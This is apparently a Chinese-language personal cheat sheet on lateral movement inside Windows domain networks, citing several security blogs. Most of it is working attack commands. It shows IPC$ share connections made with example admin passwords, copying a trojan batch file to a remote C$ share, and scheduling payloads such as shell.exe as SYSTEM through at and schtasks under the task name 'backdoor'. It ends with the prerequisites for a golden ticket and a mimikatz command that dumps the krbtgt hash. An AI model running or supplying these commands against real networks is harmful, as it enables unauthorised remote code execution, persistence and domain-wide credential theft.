内网远程连接

本来打算写在一起后面发现太乱了所以还是分开写了

参考：

https://blog.gm7.org/

https://xz.aliyun.com/t/13697

https://blog.csdn.net/weixin_45910629/article/details/137595994

ipc

条件：

开了139 445端口

开启了默认共享

#可以图形化界面输入\\10.10.10.10然后输入账号密码打开，也可以使用命令
net use \\192.168.30.151\ipc$ /u:de1ay\administrator !QAZ2wsx
net use \\192.168.30.151\ipc$ /u:administrator !QAZ2wsx

dir查看路径

dir \\192.168.30.151\c$\360safe

tasklist 有点慢要等一段时间

tasklist /S 192.168.30.151 /U de1ay\administrator /P !QAZ2wsx

计划任务上线

at

在Windows08之前的版本上

#建立连接后查看时间
net time \\192.168.30.151
#拷贝马子
copy 1.bat \\192.168.30.151\c$
#设定执行时间 如果提示绑定句柄无效 参考https://www.cnblogs.com/yzxag/p/12643726.html修改hosts
at \\192.168.30.151 12:07:00 c:\1.bat
#删除计划任务
at \\192.168.30.151 7 /del

schtasks

新版的计划任务

#创建计划任务
schtasks /create /s 192.168.30.151 /tn Gamma /sc onstart /tr c:\gamma.exe /ru system /f
#报错尝试
schtasks /create /s 192.168.183.130 /u administrator /p Liu78963 /tn backdoor /sc minute /mo 1 /tr c:\shell.exe /ru system /f
#立即执行
schtasks /run /s 192.168.75.131 /i /tn backdoor
// i：忽略任何限制立即运行任务schtasks /run /s 192.168.183.130 /i /tn backdoor /u administrator /p 0XAXSDD   // 遇到上面所说的报错时执行加上/u和/p参数分别设置高权限用户名和密码
#删除任务 /f强制删除
schtasks /delete /s 192.168.3.21 /tn backdoor /f

密码凭证获取

黄金票据

https://xz.aliyun.com/t/15713

获取了域控密钥分发账户KRBTGT 的权限利用KRBTGT 的hash即可制作黄金票据

1.KRBTGT的hash
2.本地管理员权限
3.域的sid（普通用户的sid除去最后三位就是域的sid）
4.域内任意用户的本地管理员权限

获取域的sid值(去掉最后的-500，500表示为administrator用户)

whoami /user

查看所处域

net config workstation

获取hash与sid

mimikatz.exe "log a.txt" "privilege::debug" "lsadump::lsa /patch /user:krbtgt" "exit"